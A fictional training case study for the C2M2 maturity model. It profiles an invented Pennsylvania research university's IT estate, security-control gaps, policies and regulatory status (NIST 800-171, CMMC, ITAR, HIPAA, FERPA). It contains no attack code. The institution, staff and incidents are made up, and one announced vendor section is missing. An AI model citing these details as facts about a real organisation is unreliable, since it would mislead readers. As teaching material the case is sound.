ARU — Westbrook, Pennsylvania · Fictional R1 Research University · C2M2 v2.1 Training Case Study
Allegheny Research University (ARU) is a public R1 doctoral research university in Westbrook, Pennsylvania, founded in 1887. ARU enrolls 18,400 students across seven colleges and maintains four federally funded research centers with active contracts from the Department of Energy (DOE), Department of Defense/DARPA, National Institutes of Health (NIH), and National Science Foundation (NSF). Annual research expenditure reached $185 million in FY2025, driven in large part by two high-sensitivity programs: DOE fusion energy research (Physics Department, Dr. Christine Morrow) and DOD/DARPA autonomous systems research through the Institute for Autonomous Systems (IAS). Both programs handle Controlled Unclassified Information (CUI), and IAS research is additionally subject to International Traffic in Arms Regulations (ITAR).
ARU appointed its first-ever Chief Information Security Officer (CISO), James Whitfield, 18 months ago — following a 2024 NIST SP 800-171 gap assessment that revealed 47 unimplemented security controls across the institution. The gap assessment was triggered by a CMMC Level 2 certification requirement from ARU's DOD/DARPA contract office. A Third-Party Assessment Organization (C3PAO), Granite Shield LLC, has been engaged and a CMMC Level 2 assessment is targeted for Q4 2026. The C3PAO's pre-assessment estimated an SPRS score of −87, primarily driven by failures in Access Control (AC), System and Communications Protection (SC), and Audit and Accountability (AU).
ARU's most significant structural cybersecurity challenge is its decentralized IT governance model: 24 departmental IT staff across seven colleges and four research centers operate entirely independently of the Office of Information Technology (OIT). These staff manage approximately 380 research endpoints, eight recently discovered unregistered servers, and numerous lab-specific applications — none subject to OIT security baselines, CrowdStrike EDR deployment, or Splunk SIEM coverage. Resolving this governance gap is the CISO's stated top priority for FY2026 and is the root cause of the majority of NIST 800-171 non-conformities.
| Legal Name | Allegheny Research University |
| Abbreviation | ARU |
| Type | Public R1 Doctoral Research University (Carnegie R1: Very High Research Activity) |
| Established | 1887 (chartered by the Commonwealth of Pennsylvania) |
| Headquarters | 1 University Plaza, Westbrook, Pennsylvania 15909 |
| Enrollment (Fall 2025) | 18,400 students (13,200 undergraduate; 5,200 graduate/doctoral) |
| FTE Employees | 3,633 (faculty: 1,140; staff: 2,493) |
| Annual Operating Budget (FY2025) | $685 million |
| Annual Research Expenditure | $185 million (FY2025) — 34% from DOD/DOE/DHS-funded contracts |
| Endowment | $2.1 billion (FY2025) |
| Colleges / Schools | 7 colleges (Arts & Sciences, Engineering, Medicine, Business, Education, Public Policy, Graduate Studies) |
| Research Centers | Institute for Autonomous Systems (IAS) · Translational Medicine Research Center (TMRC) · Center for Energy Research (CER) · Materials Innovation Center (MIC) |
| Active Federal Contracts (CUI-Generating) | 4 active: DOE fusion energy ($42M) · DOD/DARPA autonomous systems ($18M) · NIH translational medicine ($31M) · NSF materials science ($8M) |
| CUI-Scope Researchers | ~200 across 4 contracts (186 confirmed + ~14 estimated additional) |
| Primary Regulatory Frameworks | FERPA · HIPAA (limited — human subjects) · NIST SP 800-171 r2 · CMMC Level 2 (target) · ITAR (22 CFR 120–130) · EAR (15 CFR 730–774) · 2 CFR Part 200 |
| ISAC Membership | REN-ISAC (active); Internet2 peer network member |
| OIT Staff | ~30 FTE under CIO Dr. Sandra Petrov; 24 additional departmental IT staff NOT under OIT |
| Cybersecurity Staff (under CISO) | 1 Security Analyst · 1 GRC Specialist · 1 SOC Analyst · 1 Security Engineer (VACANT — 9 months) |
| Annual IT Budget (FY2025) | $9.57M (1.4% of operating budget; $2,635/employee — R1 peer avg: $3,800–$4,200) |
| Cybersecurity Sub-Budget | ~$1.2M (tools: $780K · training: $85K · compliance/audit: $335K) |
| First CISO | James Whitfield (appointed Sept 2024 — ARU's first-ever CISO; 18 months in role) |
| NIST 800-171 Gap Assessment | 47 unimplemented practices (of 110 total); completed March 2025 by Granite Shield LLC |
| CMMC Assessment Target | Q4 2026 (CMMC Level 2); C3PAO: Granite Shield LLC; estimated SPRS: −87 |
| Cyber Insurance | $5M limit; Travelers Cyber Risk (PA higher education consortium); deductible: $250K |
| Overall C2M2 Level | MIL 0–2 (mixed); most domains MIL 1; Risk Mgmt at MIL 2; Workforce Mgmt at MIL 0 |
ARU's primary IT infrastructure is anchored at Whitmore Hall (FAC-01), a 4,800-square-foot data center on the main Westbrook campus. A secondary disaster recovery site at the Drayton Technology Center (FAC-02) provides partial redundancy for core administrative systems. High-performance computing and research data storage are hosted at the Kellogg Computing Facility (FAC-04), which requires separate connectivity including SSH port 22 internet-facing access for external research collaborators. The Institute for Autonomous Systems (FAC-06) operates as a secured research laboratory with DARPA requirements mandating enhanced physical and logical access controls — implementation is incomplete. ARU also maintains four satellite offices in Pittsburgh, Philadelphia, Washington DC, and Brussels.
| Facility ID | Name | Location / Campus | Primary IT Systems | Physical Security Risk |
|---|---|---|---|---|
| FAC-01 | Whitmore Hall Data Center & OIT Offices | Main campus — Westbrook, PA | Primary servers (SRV-01, SRV-03, SRV-04, SRV-07, SRV-08, SRV-10); Splunk SIEM; Cisco core switching; domain controllers | Keycard + camera; server room shared key access with Facilities Dept; badge audit log reviewed semi-annually only |
| FAC-02 | Drayton Technology Center (DR) | South campus — Westbrook, PA | DR servers; web server (SRV-09); secondary domain controller; south campus network ops | Keycard only; no camera coverage; badge audit log not reviewed in 18 months; after-hours access unmonitored |
| FAC-03 | Armstrong Research Complex | Main campus — Research quadrant | 24 departmental IT staff; ~380 research endpoints; 8 shadow IT servers (discovered Nov 2025); lab-specific applications — no OIT systems | No OIT physical security standards; departmental badge systems not integrated with OIT; shadow servers found in unlocked lab closet |
| FAC-04 | Kellogg Computing Facility (HPC & NAS) | Research Park — 2 miles from main campus | HPC head node (SRV-05, RHEL 8); NetApp FAS2820 NAS (SRV-06, 480 TB); DOE and DOD/DARPA research computing workloads | Keycard access; no camera inside server room; badge system misconfigured since Oct 2025 — not logging all access events; CISA flagged non-compliant with DOE M 205.1-2 |
| FAC-05 | Harrington Administrative Center | Main campus — Administrative core | Presidential & Provost offices; Registrar; Financial Aid; 220 admin workstations | Best physical security; keycard + camera; restricted executive suite access; no significant gap |
| FAC-06 | Institute for Autonomous Systems (IAS) Laboratory | Research Park — adjacent to FAC-04 | IAS workstations + NAS (DARPA/ITAR scope); UAV simulation systems; ITAR-controlled design files; Dr. Liu's lab | ITAR requires visitor controls + access logs; visitor log paper-based and incomplete; foreign national access (Dr. Liu — Chinese national) not reviewed per ITAR deemed export rules; systems on VLAN 20 (not CUI enclave) |
Four satellite offices connect via Cisco AnyConnect SSL VPN with Duo MFA (staff-enforced; researcher/faculty adoption: 61% — HPC researchers specifically exempted at VP Research request).
| Office | Location | Function | Risk Note |
|---|---|---|---|
| Pittsburgh Research Office | Pittsburgh, PA (University Research Park) | Joint research programs; 14 staff; 18 workstations | Remote OIT support only; VPN-dependent; patching lag common |
| Philadelphia Research Office | Philadelphia, PA (University City Science Center) | NIH translational medicine satellite; 8 researchers; IRB data | IRB/PHI-scope work at non-OIT-monitored site; VPN use inconsistent |
| Washington DC Policy Office | Washington, DC (K Street NW) | Federal relations; 6 staff; federal contract liaison | Low tech footprint; primarily SaaS; VPN enforced |
| Brussels EU Research Office | Brussels, Belgium | EU Horizon grant coordination; 3 staff; visiting researchers | International; GDPR concerns; no dedicated IT support; foreign nationals with ARU credentials |
| Role | FTE | Reports To | Key Responsibilities | Notes |
|---|---|---|---|---|
| Chief Information Officer (CIO) | 1 | Provost / EVP | IT strategy, OIT budget, executive IT policy, vendor relationships, capital planning | Dr. Sandra Petrov; 7-year tenure; Ph.D. Computer Science; first CIO to hire a CISO |
| CISO | 1 | CIO | Security strategy, CMMC compliance, NIST 800-171 remediation, C3PAO liaison, incident response leadership | James Whitfield; ARU's first CISO (18 months); CISSP; former DoD contractor; limited authority over departmental systems |
| Security Analyst | 1 | CISO | Vulnerability scanning, alert triage, phishing investigation, policy compliance monitoring | OIT-managed systems only; Splunk + Tenable.io access; no after-hours coverage |
| GRC Specialist | 1 | CISO | NIST 800-171 assessment, CMMC documentation, policy drafting, risk register, POA&M management | Full-time CMMC remediation focus; manages evidence collection for Granite Shield C3PAO |
| SOC Analyst | 1 | CISO | Splunk SIEM monitoring, CrowdStrike alert response, incident documentation, IOC hunting | Monitors OIT systems only; no visibility into HPC (VLAN 60), NAS, or departmental systems |
| Security Engineer | 0 — VACANT | CISO | Intended: firewall tuning, VLAN segmentation, CUI enclave architecture, PAM tooling | Open 9 months; 3 candidates declined; market salary gap ~$22K vs. ARU compensation band |
| IT Operations Directors | 3 | CIO | Infrastructure (servers/network), Applications (ERP/SaaS), End-User Support (help desk/endpoints) | 3 separate directors for Infra, Apps, and Support verticals; OIT-managed systems only |
| HPC / Research Computing Manager | 1 | CIO | HPC cluster operations, job scheduler, storage, research computing user support | CISO has no formal authority over HPC security without VP Research Dr. Kirk sign-off |
| Departmental IT (24 FTE) | 24 | NOT under OIT — report to College Deans / Research Center Directors | Lab IT support, research endpoint management, lab applications, local network | Not subject to OIT security policy; no CrowdStrike; not in Splunk; manage 380+ endpoints and 8 shadow servers |
| Asset ID | Description | OS / Platform | Location | Status / Risk Notes |
|---|---|---|---|---|
| SRV-01 | Primary Domain Controller / Active Directory (FSMO roles, DNS primary, Duo RADIUS) | Windows Server 2022 | FAC-01 Whitmore Hall | Current — patching compliant; MFA via Duo RADIUS for VPN auth; replicated to SRV-02 |
| SRV-02 | Secondary Domain Controller / AD Replication / DNS secondary | Windows Server 2022 | FAC-02 Drayton Tech Center | DR site — patching compliant; failover tested Q3 2025 |
| SRV-03 | File Server — OIT-managed shared drives; policy documents; administrative files | Windows Server 2016 (mainstream support ended Oct 2022) | FAC-01 Whitmore Hall | Patch lag ~8 weeks; Server 2016 mainstream end; no DLP; CUI vs. non-CUI files not separated; upgrade budgeted FY2027 |
| SRV-04 | Application Server — middleware and integration services (Workday ↔ Banner; Kuali APIs) | Windows Server 2016 | FAC-01 Whitmore Hall | Patch lag ~6 weeks; Server 2016 mainstream end; single point of failure for integration services |
| SRV-05 | HPC Head Node — Lenovo ThinkSystem SR860 V2; manages DOE and DOD/DARPA compute jobs; SLURM scheduler | RHEL 8 (current) | FAC-04 Kellogg Computing Facility | CRITICAL — TCP/22 SSH open to 0.0.0.0/0 (internet); password auth only; NO MFA; DOE+DOD CUI; CISA Nov 2025 advisory (nation-state SSH targeting on university HPC) |
| SRV-06 | Research NAS — NetApp FAS2820, 480 TB; primary storage for all research data including CUI and public research | ONTAP 9.12 (current) | FAC-04 Kellogg Computing Facility | CRITICAL — CUI and public data commingled across shared volumes; no access control by data classification; NIST 800-171 AC-3 / SC-4 violation; 4 federal contract data sets on one NAS |
| SRV-07 | Splunk SIEM Server — Splunk Enterprise 9.2; security event monitoring and log aggregation | RHEL 8 (current) | FAC-01 Whitmore Hall | OIT systems only; HPC (VLAN 60), NAS (SRV-06), and departmental systems NOT ingested; forwarder not deployed on research endpoints; partial coverage is primary CMMC AU-domain failure |
| SRV-08 | Banner Integration Middleware — connects Ellucian Banner SIS (cloud) to Workday; grade submission and financial aid disbursement | Windows Server 2019 | FAC-01 Whitmore Hall | HIGH — single point of failure for $4.2M/semester financial aid disbursement; patch coordination with Banner cloud requires 12+ week lead time; ransomware on VLAN 10 could disrupt disbursements |
| SRV-09 | Public-Facing Web Server — ARU public website, event portal, research publication database | Ubuntu 22.04 LTS | FAC-02 Drayton Tech Center | Patch lag ~10 weeks; 2 unpatched CVEs (Tenable scan Nov 2025; CVSS 7.2 and 6.8); no WAF deployed; web app security testing last performed 2023 |
| SRV-10 | Backup & Recovery Server — Veeam Backup & Replication v12; OIT-managed server fleet | Windows Server 2022 | FAC-01 Whitmore Hall | Current; offsite copy to Azure Blob; restore test Q2 2025 successful; HPC/NAS and departmental systems NOT in backup scope |
| Type | Count | OS | Managed By | Security Controls | Risk |
|---|---|---|---|---|---|
| Faculty Laptops (OIT-managed) | 804 | Windows 11 / macOS 14 | OIT | CrowdStrike Falcon + Duo + WSUS/JAMF | Patching compliant; MFA enforced; EDR deployed |
| Faculty Laptops (dept-managed) | 536 | Windows 11 / macOS / Linux (mixed) | Dept IT | None (no CrowdStrike / EDR) | No AV/EDR; not in Splunk; some disable Windows Defender for research tools; include CUI-handling researchers |
| Staff Workstations | 2,200 | Windows 11 | OIT | CrowdStrike Falcon + Duo + WSUS | OIT-managed; patching compliant; EDR deployed; FERPA-scope systems included |
| Research Lab Computers | ~380 | Mixed (incl. Windows 7/XP on instruments) | Dept IT | No AV / EDR | Legacy OS on lab instruments (XP/7 required by instrument vendor); no patch path; VLAN 20 (unmonitored); some internet-connected for software licensing |
| Graduate Student BYOD | ~4,200 | Mixed (Windows / macOS / Linux / ChromeOS) | Self (no MDM) | 802.1X network auth only | No MDM; 802.1X provides access control only; VLAN 40; risk of malware if VLAN 40 isolation fails |
| Shadow IT Servers (discovered) | 8 | Unknown (Linux assumed) | Dept IT | Unknown — OIT has no visibility | Discovered Nov 2025 in FAC-03 lab closets; OS, purpose, patch status, and data content unknown; OIT attempting inventory |
| Application | Vendor | Function | Hosting | Risk / Security Notes |
|---|---|---|---|---|
| Workday | Workday Inc. | HR, Finance, Payroll, Procurement — 3,633 employees | SaaS | SOC 2 Type II; MFA enforced (Duo SSO); no significant gap |
| Ellucian Banner 9 | Ellucian | Student Information System — 18,400 students; enrollment, grades, financial aid | Cloud (Ellucian-hosted) | FERPA scope; Ellucian SOC 2 Type II; vulnerability = SRV-08 on-prem integration middleware; cloud Banner itself secure |
| Canvas LMS | Instructure | Learning management — 18,400 student users | SaaS | SOC 2 Type II; Duo SSO integrated; no significant gap |
| Microsoft 365 E3 | Microsoft | Email, Teams, SharePoint — all staff and faculty (commercial tenant) | Cloud (commercial M365) | NOT GCC — CUI must NOT be stored here per NIST 800-171; researchers actively using commercial Teams/OneDrive for CUI; 73 of ~200 CUI researchers have NOT migrated to GCC High |
| Microsoft 365 GCC High | Microsoft | CUI-compliant email and collaboration for DOE/DOD/DARPA researchers | Cloud (GCC High — FedRAMP High) | 6 months old; only 127 of ~200 required users migrated; enclave boundary incomplete; CUI arriving via commercial tenant daily |
| Kuali Research | Kuali Inc. | Grants management, proposal routing, federal contract compliance, sub-award management | SaaS | Contains federal contract terms and budget data; SOC 2 Type II; MFA not enforced for 34 PIs (password only); SAML-capable — gap is ARU config, not vendor |
| ARU HPC Cluster | Lenovo ThinkSystem (on-prem) | Research computing — DOE and DOD/DARPA simulations; ~200 active research users | On-prem (FAC-04) | SSH to internet (TCP/22 open); password auth only; NO MFA; DOE+DOD CUI; CISA Nov 2025 advisory; 2 PIs not enrolled in Duo after 6 months of escalation |
| AWS GovCloud | Amazon | DOE and DOD research data archival — completed federally funded research | Cloud (AWS GovCloud — FedRAMP High) | FedRAMP High; AES-256 at rest; IAM access controls; MFA enforced; no significant gap |
| Splunk SIEM | Splunk / Cisco | Security event monitoring, log aggregation, SOC analyst dashboard | On-prem (FAC-01 SRV-07) | OIT systems only; HPC, NAS, departmental systems NOT ingested; primary CMMC AU-domain failure |
| CrowdStrike Falcon | CrowdStrike | EDR — endpoint detection and response, threat hunting, vulnerability management | Cloud-managed | OIT-managed endpoints only; excludes 536 dept-managed faculty laptops, ~380 research lab computers, all BYOD; ~40% of total endpoint fleet excluded |
Unlike commercial IT environments where system failures translate to revenue loss, failures in research university systems can: halt federally funded research (breach of contract), expose controlled technical data to unauthorized parties (ITAR/EAR violation with potential criminal liability), compromise student financial aid disbursements (FERPA + federal financial aid regulatory failure), and — in the case of biomedical research — endanger research subjects. ARU has eight system categories with critical or high designations.
| System | Platform | Function | Connectivity | Criticality | Security Notes |
|---|---|---|---|---|---|
| ARU HPC Cluster | On-prem SRV-05 (RHEL 8, FAC-04) | Research computing — DOE fusion energy; DOD/DARPA autonomous systems simulations | VLAN 60 + Internet (SSH TCP/22 open to 0.0.0.0/0) | Critical — Research / CUI | SSH internet-facing; password auth only; NO MFA; DOE+DOD CUI; 2 non-compliant PIs; no IDS on VLAN 60; CISA Nov 2025 advisory |
| Research NAS (SRV-06) | NetApp FAS2820, 480 TB (FAC-04) | Research data storage — all centers; CUI and public data commingled | VLAN 60 (attached to HPC); VLAN 20 (faculty access) | Critical — CUI | CUI and public data commingled; access controls not based on data classification; NIST 800-171 AC-3 / SC-4 violation; 4 federal contract data sets on one NAS |
| Banner Integration Middleware | On-prem SRV-08 (Win Server 2019, FAC-01) | Connects Ellucian Banner SIS ↔ Workday; grade submissions; financial aid disbursement | VLAN 10 (admin); Banner cloud connection (HTTPS) | Critical — Academic / Financial Aid | Single point of failure; $4.2M/semester financial aid dependency; SaaS systems unaffected if SRV-08 down but disbursement workflows break; patch lag 12+ weeks |
| Microsoft 365 GCC High (CUI Enclave) | SaaS (Microsoft — FedRAMP High) | CUI-compliant email and collaboration for DOE/DOD/DARPA researchers | VLAN 30 (authorized); researchers accessing from VLAN 20 (commercial M365) | High — CMMC / CUI | Enclave boundary porous; 73 of ~200 required users NOT migrated; CUI arriving via commercial tenant daily; C3PAO cited failures in 11 of 47 unimplemented NIST 800-171 practices |
| Ellucian Banner SIS | Cloud (Ellucian-hosted) | Student records, enrollment, financial aid, grades — 18,400 students | Cloud (HTTPS); SRV-08 on-prem integration | High — FERPA | FERPA scope; Ellucian SOC 2 Type II (cloud system secure); vulnerability = SRV-08 integration middleware |
| IAS Lab Systems | Workstations + NAS on VLAN 20 (dept-managed, FAC-06) | ITAR-controlled UAV and autonomous systems research — DARPA contract; design files, simulation data | VLAN 20 (general faculty — NOT CUI enclave VLAN 30) | High — ITAR / CUI | ITAR data on commercial VLAN 20; deemed export violation (Dr. Wei Liu — Chinese national with VLAN 20 access to ITAR data); should be on VLAN 30; DARPA CO notified informally; DDTC self-report not initiated |
| TMRC Systems | Workstations + IRB server on VLAN 20 (dept-managed) | NIH-funded human subjects research; PHI; IRB protocols; biomedical data | VLAN 20 (general faculty — not HIPAA-segmented) | High — HIPAA | IRB system on general faculty network; BAA not executed with one NIH data repository; PHI-scope systems not inventoried under HIPAA; risk analysis last conducted 2022 |
| Kuali Research (Grants Mgmt) | SaaS (cloud) | Proposal development, grant tracking, sub-award management | Cloud (HTTPS); Duo SSO (partially enforced) | Medium — Federal Contract Data | Federal contract terms and budget data; SOC 2 Type II; MFA not enforced for 34 PIs; Kuali SAML-capable — gap is ARU config |
ARU's network infrastructure is anchored at FAC-01 (Whitmore Hall data center) with secondary DR at FAC-02 (Drayton Technology Center). Core switching: Cisco Catalyst 9500 series (dual-chassis VSS). Perimeter: Palo Alto PA-5220 NGFW with Panorama management (IPS signatures current). Internet connectivity: 10 Gbps commodity internet (Comcast Business) + Internet2 research network peering (100 Gbps) for high-speed research data transfer. Remote access: Cisco AnyConnect SSL VPN with Duo MFA (enforced for staff; researcher/faculty adoption 61%; HPC researchers exempted at VP Research request). Wireless: Cisco Catalyst 9100 APs; 802.1X for staff and OIT-managed faculty; PSK for student residential; eduroam for visiting international researchers.
| VLAN | Name | Subnet | Primary Systems | Risk |
|---|---|---|---|---|
| VLAN 10 | Admin / Corporate | 10.10.0.0/20 | Staff workstations (2,200); OIT servers (SRV-01, SRV-03, SRV-04, SRV-07, SRV-08, SRV-10); Splunk SIEM; CrowdStrike-managed endpoints | Best-controlled segment; CrowdStrike deployed; Splunk ingested; MFA enforced; access reviews current |
| VLAN 20 | Faculty / Research (General) | 10.20.0.0/18 | OIT-managed faculty (804); dept-managed faculty (536); research lab computers (~380); IAS lab systems (ITAR scope); TMRC IRB server | ITAR data present (IAS); dept systems unmonitored; no CrowdStrike on dept devices; TMRC PHI not segmented; foreign national access to ITAR systems |
| VLAN 30 | CUI Enclave (CMMC) | 10.30.0.0/24 | 127 enrolled CUI researchers; GCC High-connected endpoints; CMMC-scoped systems; dedicated policy enforcement | Boundary incomplete — 73 of ~200 CUI researchers still on VLAN 20 / commercial M365; CUI arriving via commercial tenant daily; 11 NIST control failures attributed to this gap |
| VLAN 40 | Student / Residential | 10.40.0.0/18 | ~4,200 graduate student BYOD; student lab computers; residential network | BYOD; 802.1X auth only; no MDM; no EDR; isolated from VLAN 10/30 via ACL |
| VLAN 50 | eduroam (Visiting Researchers) | 172.16.50.0/22 | Visiting international researchers; conference visitors; external collaborators (eduroam credentials) | Fully isolated — no route to any ARU internal VLAN; internet-only access; acceptable posture |
| VLAN 60 | HPC / Research Computing | 10.60.0.0/24 | HPC head node (SRV-05); NetApp NAS (SRV-06); 48 compute nodes; SLURM scheduler | TCP/22 SSH open to internet (0.0.0.0/0); no IDS/IPS on segment; DOE+DOD CUI; Palo Alto SSH inspection disabled; CISA Nov 2025 advisory; nation-state targeting risk |
| VLAN 70 | IoT / Lab Instruments | 10.70.0.0/22 | Legacy lab instruments (Windows XP/7); building automation systems; smart HVAC; environmental sensors | Legacy OS (XP/7) — no patch path; building automation on same segment as instruments; some instruments require internet for vendor licensing (poorly controlled outbound rules) |
| VLAN 80 | IT Management | 10.80.0.0/24 | Server management interfaces (iDRAC/BMC); OIT admin workstations; CyberArk PAM (in deployment); network management systems | Restricted access; admin workstations only; PAM deployment in progress (CyberArk — 60% deployed); iDRAC credentials being rotated per CMMC remediation |
ARU's security posture reflects an institution in transition: OIT-managed systems have foundational controls in place (EDR, SIEM, MFA, NGFW), but coverage is incomplete — systematically excluding the highest-risk environments: the HPC cluster, the Research NAS, departmental research endpoints, and shadow IT servers. The CMMC gap assessment identified this partial-coverage pattern as the root cause of 31 of the 47 unimplemented NIST 800-171 practices. The controls below represent the state as of the Q1 2026 assessment.
| Control Domain | Tool / Solution | Coverage | Status | Key Gap |
|---|---|---|---|---|
| Perimeter Firewall / NGFW | Palo Alto PA-5220 + Panorama (FAC-01) | All inbound/outbound internet traffic; all campus VLANs | Partial | SSH inspection disabled on VLAN 60 at VP Research request — eliminates visibility into HPC internet-facing SSH sessions; IPS signatures current but ineffective on uninspected traffic |
| Endpoint Detection & Response (EDR) | CrowdStrike Falcon (cloud-managed) | OIT-managed endpoints only: 804 faculty laptops + 2,200 staff workstations = 3,004 endpoints (~37% of total 8,128) | Partial — 37% coverage | 536 dept-managed faculty laptops, ~380 research lab computers, ~4,200 student BYOD, and 8 shadow servers completely excluded; CUI-handling researchers on unmanaged devices |
| SIEM / Log Management | Splunk Enterprise 9.2 (on-prem SRV-07, FAC-01) | OIT-managed systems (VLAN 10, VLAN 80, select VLAN 20 OIT devices) | Partial | HPC cluster (SRV-05), Research NAS (SRV-06), VLAN 60, departmental systems (VLAN 20), shadow servers — NOT ingested; SOC analyst has no visibility into highest-risk environments; primary CMMC AU-domain failure |
| Multi-Factor Authentication (MFA) | Duo Security (integrated with AD; Cisco AnyConnect VPN; M365 GCC High) | All staff (2,200) — enforced; OIT-managed faculty — enforced; VPN — staff enforced; researcher/faculty VPN adoption: 61% | Partial | HPC cluster SSH exempt at VP Research request; 39% of researchers not using VPN+MFA for remote access; 34 PIs not using MFA for Kuali Research; Duo not required for eduroam (visiting researchers) |
| Vulnerability Management | Tenable.io (cloud-based; authenticated scanning) | OIT-managed servers (SRV-01 through SRV-10) and OIT endpoints | Partial | HPC (SRV-05) and NAS (SRV-06) scanning blocked — HPC Manager cites performance impact; departmental systems and shadow servers not scanned; 2 open CVEs on SRV-09 (CVSS 7.2, 6.8) unpatched 10+ weeks |
| Backup & Recovery | Veeam Backup & Replication v12 (SRV-10) + Azure Blob offsite copy | OIT-managed servers (SRV-01 through SRV-04, SRV-07 through SRV-10); offsite: Azure Blob | Partial | HPC compute nodes and SRV-06 Research NAS (480 TB CUI data) NOT backed up; departmental systems and shadow servers excluded; HPC/NAS recovery plan: none documented |
| Identity & Access Management (IAM) | Microsoft Active Directory (Windows Server 2022); Azure AD Connect; Duo RADIUS | OIT-managed user accounts; all staff and OIT-managed faculty | Partial | No formal access review cycle (last conducted: 18 months ago); departmental IT staff manage their own accounts outside OIT directory; shadow IT server accounts unknown; 12 inactive accounts identified in March 2026 review |
| Data Loss Prevention (DLP) | None deployed | No coverage | Not Deployed | CUI flowing through commercial M365 (uncontrolled); no inspection of outbound email/file transfers for CUI keywords; no USB restriction policy enforced; C3PAO cited DLP absence as contributing to 6 NIST 800-171 failures (MP-5, SC-28, SI-12) |
| Privileged Access Management (PAM) | CyberArk Privileged Access Manager (cloud-hosted; in deployment) | 60% deployed — OIT sysadmins and some server privileged accounts vaulted | In Deployment | HPC cluster privileged accounts, NAS admin accounts, departmental IT privileged accounts NOT in CyberArk; completion target: Q3 2026; Security Engineer vacancy slowing deployment |
| Email Security | Microsoft Defender for Office 365 Plan 1 (commercial M365); GCC High configured separately | Commercial M365 tenant (all staff/faculty); GCC High (127 enrolled researchers) | Partial | 73 CUI researchers still on commercial M365 — receiving and sending CUI outside CMMC boundary; commercial M365 ATP policies not tuned for research environment; no anti-phishing custom training for research PIs |
| Physical Security | Keycard access (Honeywell Pro-Watch) at FAC-01, FAC-02, FAC-05; camera (Axis) at FAC-01, FAC-05 | Primary facilities FAC-01 and FAC-05 (best); FAC-04 compromised | Partial | FAC-04 (HPC) badge system misconfigured since Oct 2025 — not logging all entries; FAC-03 (Armstrong Research) has no OIT physical security standards; FAC-06 (IAS) visitor controls inadequate for ITAR; CISA flagged FAC-04 in Jan 2026 |
| Security Awareness Training | KnowBe4 (contracted); targeted phishing simulations | OIT-managed staff and faculty accounts assigned training; ~3,000 assignees | Not Enforced | No mandatory enforcement; completion rate not tracked; Faculty Senate resolution cited against mandating training; zero ITAR/EAR-specific training for researchers; zero CUI handling training for PIs; departmental IT staff excluded from KnowBe4 program |
ARU's third-party risk posture is fragmented across two parallel vendor ecosystems: OIT-managed vendor relationships (with formal contracts, SOC 2 reviews, and BAAs where applicable) and departmental vendor relationships (acquired independently by 24 departmental IT staff, largely unknown to OIT, with no security vetting). The CMMC pre-assessment identified the lack of a formal Third-Party Risk Management (TPRM) program as a contributing factor in Supply Chain & Dependencies domain failures. Six key vendor relationships are assessed below.
| Policy Name | Status | Last Reviewed | Key Gap |
|---|---|---|---|
| Information Security Policy (Master) | Exists — Outdated | March 2022 | Predates CISO appointment; does not address CMMC, CUI, or departmental IT; under revision by GRC Specialist (target: May 2026) |
| Acceptable Use Policy (AUP) | Exists — Outdated | January 2021 | Does not address CUI handling, research data classification, or GCC High enclave requirements; faculty senate objects to USB restriction provisions |
| CUI Handling & Data Classification Policy | Does Not Exist | — | Critical CMMC gap; no policy defining CUI identification, marking, handling, or approved systems; draft in progress by GRC Specialist (target: June 2026) |
| System Security Plan (SSP) — CMMC Enclave | Draft — Incomplete | In progress (started Sept 2025) | Required for CMMC Level 2 assessment; 60% complete; enclave boundary section not finalized due to 73 unmigrated researchers; Granite Shield C3PAO review scheduled Q3 2026 |
| Incident Response Plan (IRP) | Exists — Outdated | November 2023 | Does not address HPC compromise scenario, ITAR breach notification, DFARS 252.204-7012 72-hour reporting, or FERPA breach; last tabletop exercise: 2022 |
| Export Control Policy (ITAR/EAR) | Does Not Exist | — | No institutional ITAR/EAR technology control plan; no deemed export screening for research staff; IAS incident (Dr. Liu) directly attributable to this gap; Office of Research Compliance owns this — not OIT |
| Remote Access Policy | Exists — Outdated | February 2022 | Does not require MFA for all remote access; does not address HPC exempt status; VPN split-tunneling allowed without restriction |
| Data Backup & Recovery Policy | Exists — Current | August 2025 | Scoped to OIT-managed systems only; HPC cluster and Research NAS explicitly excluded ("managed by VP Research office"); no RTO/RPO defined for research data |
| Third-Party Risk Management Policy | Does Not Exist | — | No vendor security assessment requirements; departmental vendor acquisitions not subject to OIT review; C3PAO (Granite Shield) was engaged before a TPRM policy existed |
| Physical Security Policy | Exists — Outdated | June 2021 | Does not address Research Park facilities (FAC-04, FAC-06); predates ITAR requirements for IAS lab; badge audit requirements not met at FAC-04 |
| HIPAA Privacy & Security Policies | Exists — Outdated | March 2022 | HIPAA risk analysis dated 2022; does not cover TMRC PHI-scope systems; BAA inventory incomplete (1 NIH data repository BAA not executed) |
| Security Awareness Training Policy | Does Not Exist as Mandatory Policy | — | KnowBe4 training assigned but not required; no policy mandating completion or defining role-based requirements; Faculty Senate resolution creates enforcement barrier; NIST 800-171 AT-2 / AT-3 non-conformity |
| Framework | Applicability | Current Compliance Status |
|---|---|---|
| NIST SP 800-171 r2 | All DOE, DOD/DARPA, and applicable NIH/NSF CUI-handling research | Non-Compliant — 47 of 110 practices unimplemented; SPRS estimated: −87; C3PAO assessment Q4 2026 |
| CMMC Level 2 | DARPA autonomous systems contract (required by contract clause); extends to all CUI-scope systems | Not Yet Certified — pre-assessment complete; POA&M in progress; target certification Q4 2026 contingent on gap closure |
| FERPA | All student education records (18,400 students; Banner SIS; Canvas; Workday academic integration) | Substantially Compliant — Ellucian Banner SOC 2 Type II; annual FERPA training assigned; SRV-08 middleware is primary vulnerability; no FERPA breach history |
| HIPAA Security Rule | NIH-funded human subjects research (TMRC); limited PHI scope | Partially Compliant — HIPAA risk analysis dated 2022 (overdue); BAA incomplete (1 NIH repository); TMRC PHI-scope systems on VLAN 20 (not segmented); no encryption verification on TMRC endpoints |
| ITAR (22 CFR 120–130) | IAS DARPA autonomous systems research (UAV/autonomous vehicle defense articles) | Active Violation — deemed export violation (Dr. Liu); DDTC self-report not yet filed; IAS data on VLAN 20 (not CUI enclave); no Technology Control Plan; export license review overdue |
| EAR (15 CFR 730–774) | Dual-use research with potential export control implications (Materials Innovation Center, computational research) | Limited Assessment — no formal EAR screening program; Office of Research Compliance handles case-by-case; systematic review not conducted; low current risk vs. ITAR |
| 2 CFR Part 200 (Uniform Guidance) | All federal grant funding (DOE, DOD/DARPA, NIH, NSF — $185M total) | Substantially Compliant — Kuali Research grants management; financial audit current; cybersecurity controls are the primary open compliance gap affecting grant renewals |
| Pennsylvania Breach Notification Law (73 P.S. §2301) | Any breach of PA resident personal information (students, employees) | Policy Aware — legal counsel has standing guidance; 60-day notification requirement; no breach history; IRP addresses but predates FERPA/HIPAA specific triggers |
